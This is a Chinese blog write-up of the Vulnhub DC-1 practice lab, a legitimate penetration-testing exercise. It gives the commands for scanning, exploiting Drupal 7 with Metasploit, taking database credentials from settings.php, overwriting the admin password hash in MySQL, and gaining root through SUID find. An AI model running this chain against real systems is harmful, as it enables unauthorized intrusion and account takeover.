Vulnhub系列之DC1靶场详解

已于 2023-09-01 15:55:01 修改
阅读量267 收藏 2
点赞数
分类专栏: DC 文章标签: 网络安全 linux web安全
于 2023-08-09 15:55:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54960572/article/details/132179211
版权

文章目录

环境搭建

靶机:DC-1靶场
攻击机:kali
靶场下载链接: https://download.vulnhub.com/dc/DC-1.zip

环境配置

kali和靶场网络都配置为:NAT模式
网络设置NAT模式

0x01信息收集

1.使用nmap工具扫描网段在线主机

nmap -sS 192.168.17.1/24

靶机ip地址及开放端口
开放22端口:后续可ssh连接
开放80端口:后续访问网页

2.使用whatweb查询网站基本信息

whatweb 192.168.17.130

网站基本信息
发现CMS为Drupal 7,后续可扫有没有版本漏洞
注: Drupal是一种免费开源的内容管理系统(CMS),它由Drupal社区开发和维护。 Drupal可以用来创建各种类型的网站,包括博客、企业网站、社交网络和电子商务网站等。

3.使用dirsearch工具扫描网站目录

dirsearch -u 192.168.17.130

提示没工具的话,用apt安装

apt install dirsearch

在这里插入图片描述

扫到一堆好似没有发现重要的

0x02渗透测试

利用MSF工具扫描Drupal 7有没有版本漏洞

1.启动MSF

msfconsole

在这里插入图片描述

2搜索漏洞

search Drupal 7

在这里插入图片描述

3利用漏洞

尝试验证后发现编号为1的exp可以利用,选择进入

use 1

输入options获取配置内容

options

yes选项是必须配置的,如:rhosts
在这里插入图片描述
设置rhosts

set rhosts 192.168.17.130

在这里插入图片描述注:
rhosts:靶机IP地址
lhosts:攻击机IP地址

配置完成后输入run开始攻击

在这里插入图片描述
出现meterpreter代表渗透成功
输入shell获取目标主机的远程命令行shell在这里插入图片描述
发现是非交互式界面,可以利用python实现交互式

python -c 'import pty;pty.spawn("/bin/bash")'

此时非完全交互式,不能用删除,上下键等等。也就是命令一定要输对,不然就得重新手输,烦的很

4寻找到flag1,2,4

利用find命令查找flag

find / -name "flag*.txt"

在这里插入图片描述
好好好,发现了flag1flag4
咱们先用cat命令来查看flag1

cat /var/www/flag1.txt

在这里插入图片描述
flag1提示配置文件
ok,继续用find查找

find / -name "config*"

配置文件一般在/var/www的路径目录下
查询无果
想起来是CMS是drupal,浏览器查询发现配置文件在 /sites/default/settings.php
再find一下

find / -name settings.php

在这里插入图片描述
用cat查看一下内容
在这里插入图片描述
发现flag2提示暴力破解获权限没用
同时发现一个数据库账号和密码
直接用mysql登录

mysql -udbuser -pR0ck3t

注意:-u和-p后面没有空格,直接加用户名和密码

在这里插入图片描述
接下来查看数据库

show databases;

注意加 ;号
在这里插入图片描述
前面配置文件提示是drupaldb数据库
直接进入

use drupaldb;

在这里插入图片描述
查看都有什么表

show tables;

在这里插入图片描述
发现users可疑,进去瞧瞧

select * from users\G;

/G 的作用是将查到的结构旋转90度变成纵向

在这里插入图片描述
发现两个用户,密码是hash加密的
破解密码思路:john工具爆破;mysql命令更新密码
ok,先无脑爆破一手
先把密码复制到文本里然后运行命令

john passwd.txt

在这里插入图片描述
等了好久好久,发现没有进展
好好好flag2诚不欺我,果然无法爆破
那接下来只好寻找加密文件了

find / -name "*hash*" 2>/dev/null

在这里插入图片描述
cat命令查看源码

cat /var/www/scripts/password-hash.sh

在这里插入图片描述
发现注释说明要php运行
那么bash运行肯定会报错
下面选一个运行(第一个是通用的,首选)

./scripts/password-hash.sh
php ./scripts/password-hash.sh

根据用法提示我们来加密 1234

./scripts/password-hash.sh "1234"

在这里插入图片描述
接下来复制hash,回到mysql中,替换admin的密码

update users set pass="$S$Dkx2b6iXIYHFb1SEsiAAWOT6rtsczcU65xAai7Q7EHE.00p4KSDh" where name="admin";

在这里插入图片描述

mysql>update 表名 set 字段=“值” where 子句 order by 子句 limit 子句
WHERE 子句:可选项。用于限定表中要修改的行。若不指定,则修改表中所有的行。

5登录网页(发现flag3,4)

利用admin和修改后的密码登录网页
点点点后发现flag3
在这里插入图片描述

在这里插入图片描述
提示shadow,在Linux系统中,/etc/shadow 目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件
shadow没有权限的话,那就查看/etc/passwd

还提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束 ;, 该分号前面要放反斜杠转义(后续提权用到)

shadow和passwd差别大家可以参考这篇文章
https://blog.csdn.net/qq_43531669/article/details/123490284

cat /etc/passwd

在这里插入图片描述
好好好,又发现了flag4,这回打开看看

cd /home/flag4
cat flag4.txt

在这里插入图片描述

5提权

提示用flag3的提示方法提权
先看一下当前用户的suid权限(让普通用户临时拥有该文件的属主的执行权限)

find / -perm -u=s -type f 2>/dev/null

/ 根目录(查找位置)
​ -perm 权限
​ -u 用户(s=特权)
​ -type 类型
​ f 文件
​ 2>/dev/nul 过滤错误信息(不显示错误信息)

在这里插入图片描述
发现有find,可以利用find提权

find / -exec "/bin/bash" -p \;
  • find 是一个用于查找文件和目录的命令。
  • / 是指要在根目录下进行查找。
  • -exec 是一个选项,用于在找到的每个文件上执行一个命令。
  • "/bin/bash" 是要执行的命令,这里是一个指向Bash shell的路径。
  • -p 是Bash shell的选项,用于启用特权模式,即以管理员权限运行。
  • \; 是一个分隔符,用于告诉find命令在每个找到的文件上执行命令。

因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。

在这里插入图片描述

成功提权
前往root目录下查找最后的flag

cd /root
ls
cat thefinalflag.txt

在这里插入图片描述
结束!!!

ksbbg
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHubDC-1
weixin_39219503的博客
01-29 219
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-1,292/ 题目信息如下,环境中有flag文件,里面有hint DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. ...
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2632
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
Vulnhub靶机:DC-1渗透——新手进阶3
m0_75051044的博客
03-19 254
攻击机:kali靶机:Vulnhub靶机:DC-1靶机下载:DC: 1 ~ VulnHub 在靶机描述里说明有5个flag在VMware中打开靶机,将虚拟机网络适配器改为NAT确定靶机ip 信息收集/服务确认,用namp扫描 利用MSF确定漏洞,攻击,进入metepreter提权 查找flag1.txt查找flag2,根据flag1的提示,进入settings.php文件数据库账号和密码进入数据库查看数据库进入drupaldb库中查看库中的表 查看表中内容,可以看到admin的密码给加密了S SSD应
DC-1靶场
最新发布
mlws1900的博客
03-21 915
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
DC-1靶场初探
m0_52361291的博客
06-19 693
DC系列靶场环境,这是个模拟红队从信息收集到打点再到提权可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的。靶场下载环境:https ://download.vulnhub.com/dc/DC-1.zip下载完成后就是一个DC-1.ova文件双击用vm打开 就行了可以看到整个环境测试为黑盒测试(无登录账户和密码)首先,先对目标进行信息收集可以看到靶机开了22,80,111三个端口通过浏览器去访问靶机的网页可以看出是DrupalCM
DC靶场系列--DC1
BGiscool的博客
06-28 4586
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
vulnhub DC:1靶场
weixin_46420165的博客
12-28 309
据某个帖子说是因为现在有一个在线的MD5数据库,可以查到很多MD5码的原文,因此Drupal 7的开发者认为不能再继续采用这种极不安全的方法了,因此Drupal 7采用了新型的Hash加密方法来确保密码安全。要成功完成这一挑战,您需要 Linux 技能、熟悉 Linux 命令行以及基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。网络是为 DHCP 配置的。它旨在对初学者来说是一个挑战,但它的难易程度取决于您的技能和知识以及您的学习能力。
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
海尔智能电视刷机数据 LE37A320 机编DC1EF000001-03 务必确认机编一致 强制刷机 整机USB升级主程序
02-28
务必确认机身编号与文件名机编一致,如不一致,请勿下载 机身编号一般在机子背面的贴纸上 升级方法: 1、下载数据,压缩包解压,将“target”文件夹(注意是文件夹)整个拷贝到U盘根目录下(U盘要求使用FAT32格式,...
海尔H32E08A刷机固件_机编DC1LF001700_整机软件数据_务必确认机编一致
12-21
海尔H32E08A刷机固件_机编DC1LF001700_整机软件数据_务必确认机编一致 官方固件无精简无修改 电视正常使用情况下,不建议刷入此固件 刷机有风险,操作需谨慎
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC-1靶场通关笔记
告白的博客
07-19 654
0x00 DC-1靶场介绍 靶场介绍:关于VulnhubVulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试 渗透要求:靶机需要获得root权限,并找到所有的5个flag 环境配置:因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,这里我选择NAT模式 0x01 信息收集 首先进去DC-1靶场环境,显示一个登录页面,我们无法得到账户与密码,因为靶机在NAT模式,故可以用域内存活主机利用工具扫描域内存活主机 1)目标IP收集 这里利用kali扫描域内存
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1渗透靶场实战速通版
saber的博客
12-01 753
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC系列】DC-1靶机实战详细讲解
weixin_44681307的博客
06-27 143
Dc-1靶机突破方法
DC1靶场 Drupal
m0_62438849的博客
03-02 1020
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
DC-1靶机实战和分析
weixin_48202759的博客
08-31 829
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对VulnhubDC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值